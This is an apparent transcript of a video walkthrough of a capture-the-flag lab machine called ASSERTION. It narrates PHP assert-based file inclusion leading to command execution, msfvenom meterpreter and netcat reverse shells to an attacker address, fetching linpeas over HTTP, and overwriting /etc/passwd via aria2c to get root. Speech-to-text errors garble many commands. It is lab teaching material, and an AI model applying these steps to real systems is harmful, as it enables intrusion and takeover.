Hello guys, welcome back to Adventist Club. Today we're going to solve another CTF challenge name called as ASSERTION. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first, open the terminal. So first, you just type your sudo su, enter your password, then you just type your sudo net discord minus I 80. So first we would like to identify our target machine. So I have identified my target machine. Then later you just type it as nmap minus 34 minus as and across scan and enter your target IP address. So let's wait for the nmap result. So I have got the nmap result. One is available with SH, another one is available with port 8. So first we would like to walk to the targeted IP address. So just enter your targeted IP address 192.168.18.87, where you can see here as a ASSERTION. Now let it wait for until this one loading. So it's taking us a little bit lengthy time process to loading this. So I have got it here. Now it's just like China's for fitness and sports, where you can see here it's like timetable. It's like monthly for $55, professionals for $95, advanced for $165. So it's just like as a online gym, and it's like coloring. So I have already did this coloring as exploit one time. Now just look here. So this well and good. Now just copy this. Now just come back here. So just type it as directory buster. Then and let me just close this. I just type here as a clear. Now let's just go with as directory buster. In this directory buster, I think we not to get any useful information from here. Let's look. I not to get any useful information, so I just type it as clear. Now let's come back here. Now let me just look as a page source. In this page source, now where you can look here in the downside, where index.php is gallery schedule block. So we would like to look as a gallery. So in this case, so just copy here, cut, I just paste here. Now let's look what we can get it here. So it's still loading, let it load. After loading this one, then we would like to go further. So it's not even taking for loading. Now it's yes, it's same thing, but we are not loading. So I think like it's like we got like index.php and parameter ID is page and it like a gallery. Now let me, I would like to try as from here as, let me just try as etc as password. Let's just try here, file does not exist. So let me just try as a local file inclusion. I'll just put here as etc as password, and it says not so easy, brother. We just need to try very harder. So for this, try as a very harder. Now let me just do as a local file inclusion. This we just need to get like PHP file and filter. Otherwise, we would like to utilize as a stack overflow error. So we would like to utilize as let I just put here a stack overflow error. Let me, I would like to look this. So here it's may not getting here. Now I just type it as a assert as local file inclusion in the Google. So it's may not taking a much. It's taking much time. Let it load. Testing for a local file inclusion. So now let I just click on open in the new tab. Then this also I just open in the new tab. So we just need to look here. Local file inclusion. This is a thin assertion for the library. So you just need to click on open the file. So which one will come first? We would like to go with that. So where you can look here, this is with etc with a password where we not yet get. Now to add to get file, then where if you enter with the passwords with the PHP extensions you not yet get. Then if you want to get PHP info, then data with the plain text, no, we not yet get here. With this I didn't get anything else. So this is a wrapper can be used for PHP convert with the file. We would like to try one time this one. Just copy this, come back here. So we are going to try this. File does not exist. Okay. In this case we not to get anything else. So now we would like to come back here. So this is like assertion where you can get it with the, here is the I have got it here as a payload. Now you just entirely just copy, come back here. Now let's just close this and just paste it. I have successfully got it here where I have like fnx, source, polysnake, landscape, DNS mask. So there is like multiple things here we can get everything. So you just need to do the research first. If you're trying or exploiting something, you just need to make 100% research, then you can try. You can get it 100% results, 100% bounty without fail. Don't need to be get disappointed. Now where I have got it here, now what you would like to try here. Now, where I have got this entirely. Now, in this case, now let me, I would like to look as in the like, I just put here as a source, show a source. Now I just need to put as a system. Then let me, I just delete entirely here as etc password. Then I just put here as who am I, then just enter. I have got here as www.data. That's it. Now here in the who am I place, I just put here as id. I get it here. Now you just type here as again in this id place. You just put here as which Python. You can get very easily. Now if you want to get again here as a which Python 3, it's also available with a Python 3. That's it. So now what you just need to do here is, now I already have a Python 3 as an exploit. So let me, I just copy this a Python 3 exploit. Now let me, I would like to go for as let me, I would like to do here is something as a modification. So I just copy this entirely. I just copy in this who am I place, I just paste it here entirely. Now just entirely just copy this. Now go for as URL encode. Now first visit to the targeted link. Now you can encode everything of your targeted URL. Otherwise you can use like a PHP exploits, that anything what else you like. That's it here. So here is available as Python, so I would like to try as first as Python. So I just entirely just paste it here and try to encode it. So this is my payload. I just copy. Now let's come back here. We just put here as netcat minus LVNP 7890. So where I have put here as 7890. This is the port. Now let's come back here. Go to here. Now we just entirely delete this and just paste it. Now I noted yet as a reversal here. So I think I have made a mistake. Now let's, we would like to do here is, so better I just close this. So now I just type it as clear. Now I would like to try with as MSF Vina and create a payload for as a Linux and x86 meter preter. Then just type here as reverse underscore TCP al host equal to 192.168.18.122 al port equal to I would like to put as 4444, output as elf to get as a shell dot elf. Now it will generate a shell. Now we have our shell here, shell dot elf. Now I just type here as python minus m http dot a server. Now it was running. Now we would like to go back here. Go back here. Now from here, now just put here as wc get http. You just put as http and tell your target IP address 192.168.18.122, and you just put here as 8000. Then you just put here as shell.elf, and I just need to save this one in the temporary file as shell.elf. That's it. Everything is done now. Now, if you want to run this, okay, where it was done, they already get this file. Now, we would like to open new tab. Now, you just make it as a little bit big. Now, just type your as netcat lvrp 4444. That's it now. Now, if you want to run this, okay, in this case, now just type here as entirely this one, delete it. Now, you just need to type as a temp as shell.elf. But I didn't get as a result here also. So why we not get again as a result here? So we tried here in two ways, but we not get anything else. So now I would like to go back to as a pentest monkey. Then I just try with as pentest monkey here. That's it. So we cannot able to try uh, get fail. Now we would like to go as a pentest monkey. Now we would like to come back here. Which PHP? So there is a PHP. So we can run with as PHP. Per this is an PHP. Otherwise, so I would like to run with this, go with this as netcat. We would like to try as netcat is available. Yes, it's also available as netcat. Now, we would like to try as this as netcat. Then come back here. 192.168.18.122 and 4444. In this case, we would like to copy this, copy, come back. So we just need to make it this one as URL encode. So we just copy entirely here. Now go back here, paste it, then try to encode. So I have got it here. Now I would like to run first this one. I not yet get connected. Now let me just remove this. Then let's just paste it here. Now it was connecting now, which is connected here. Now just type ID, you got it here. Now just type here as which Python, you got it here. You just type here as Python -c, import pdy spare bin bash. Now where we have get it here as uh, HTML. Now, we would like to get here as, now just write plus minus L, now just write here as cd, home directory, now just write here as clear, so just write here as export, term equal to extra, you just write here as clear plus minus L, cd fnx permission is denied, cd s was that permission is denied. Okay, that's well and good. Now we would like to come back here as how we would like to do here is, so we cannot able to come here anything else. Now we would like to try here as something. So I would like to, I already have here as a linked. Now, I would like to go to a temp directory. Now I just try plus minus al. So where I have get this shell.elf, that's where now I just type here as wget http and enter what targeted IP address 192.168.18.122 and you just put as 8000 linkbase.sh. I have got it here. You just put here as chmod plus x linkbase.sh where I have give the permission. I just type here as linkbase.sh. Now it was running. So let it run this. Then we can look where we can identify the vulnerabilities here. So we would like to look here where is the loophole to get to attack this machine. So first let it run everything. This one. So where I have identified here, you look here, user bin area 2C. So what is this area 2C? So I would like to go and search with the GTF bins. We would like to close this. Now we just go to as GTF bins. Now we just type here as area 2C. Let's just open this. So you can look here to overwrite. So where we can get it here, this one. It's like area 2C file with the any file. Then echo with area on downloads or any file. So Now we would like to go back here. Uh, Here we have area where we have seen this. Now I just type here as clear. Now you just type this as here as so. In this case, here not yet given as a right thing. Now just type here as area to see. So let's we just look this. So area with the targeted example with ISO. So let me just try here as we would like to go back. Now we just put here as cat etc password where I have getting here. So we just need to get only these two things. So now just type here as clear. Now let we would like to utilize here. Now we would like to try as I just type here as area uh, 2c minus help where you can get here everything as I for a inputting file, C for continue, then V for check the integrity, D for as directory, L for log file, O for output file. So where you can see here. Now even we can see here as oh sorry, we just put here as cat etc as password where we can see here only we just have only read permission. Now we just type here as clear. Now we just type here as area 2c minus I for etc password. It was unrecognized, no files is downloaded, but here is get here. We can get as access this also, where fnx to here everything. Now, that was well and good. Now, we would like to type here as clear. Now, we just type here as cat etc password. Now, entirely just copy this. I just entirely just let me look here. Yes, entirely just copy here. I would like to open as new notepad. Now what I would like to write here is you just put here as nan password, then I just paste here. Now I want to get only the root access. I don't want to get anything else. Okay. Now I would like to uh, add a something here, like I just need to create this. So I just put here as a top, just copy. So I just need to put here as top. Oh sorry, I just paste it here as top. Now just write Control O, Control X. That's it. Now let we just it's Python is running here again where we have got it as uh, shell.elf linkbase.elf. Now let me just get it here. Let me just type here as clear. Now just type list minus l. Now we just type here as wget http Now just put here as 192.168.18.122. Just put here as 8000 password, where I have got it here, this password. Now to go to this area, so I would like to put here as move this password to a new password. That's great. Now just type plus minus here, new password. You just type as cat a new password, where I have got it here. Now just type here as clear. Now what you would like to try here is, now let we just utilize as area to see output as password. I would like to look here as one more time. Now let's we just try here as password as HTTP and terabyte architecture. I get as 192.168.18.87 as password. Now I just put as hello as overwrite equal to a true. So where torrent file is missing. Okay, so uh, for better thing, I would like to go as, so I have got here as something mistake. Now I would like to go to as cd as etc. In this place I would like to try this, the command. Oh, so just copy, paste it, and again I have got it here as same, something mistake. Now we can try this as one more time. Now I just type it as clear. Let's just paste it this. Now I would like to put here is 122. I just put as 8000 as password. Then I just put as hello as overwrite equal to true. It was done. Status is okay now. We don't have any type of mistake here. Now I just put here as cat etc password, where I have added this stop successfully. Now here you can look here, you have added here successfully. And I just type here as, I would like to go to npm directory only, so I just type here as clear. You just type here as su for a top, and it asks a password. So I have created the tom password is, let me just put here as, put as a password at the rate 973. So we just entirely just copy, come back, and let's just paste it here. I have kept directly as a root now. Now just type here as cd a root. So first we would like to look as home directory. Plus minus a cd fnx. Now just type plus minus a. Don't touch me. So we have cat user.txt. This is a user flag. Now you just type here as file a don't touch me. It's like elf file, so it is maybe an exploit, so we don't need to touch. Just go back. Now just type it as clear. Now just try plus minus here. So we have identified one flag. So if you want to look here as again, now just type cat fnx. So otherwise you just put here as home fnx user.txt. This is an user flag. Now just type here as plus minus l home SOZ, where here no have anything useful informations. That's it. Now just type here as cd as a root. Now just type plus minus l. Now just type here as clear. I just type here as cat a root.txt, where we have identified the root flag. That's it. Where we have successfully get the root access of this machine. That's it. So you try it your own, guys. Thank you guys for watching and keep smiling.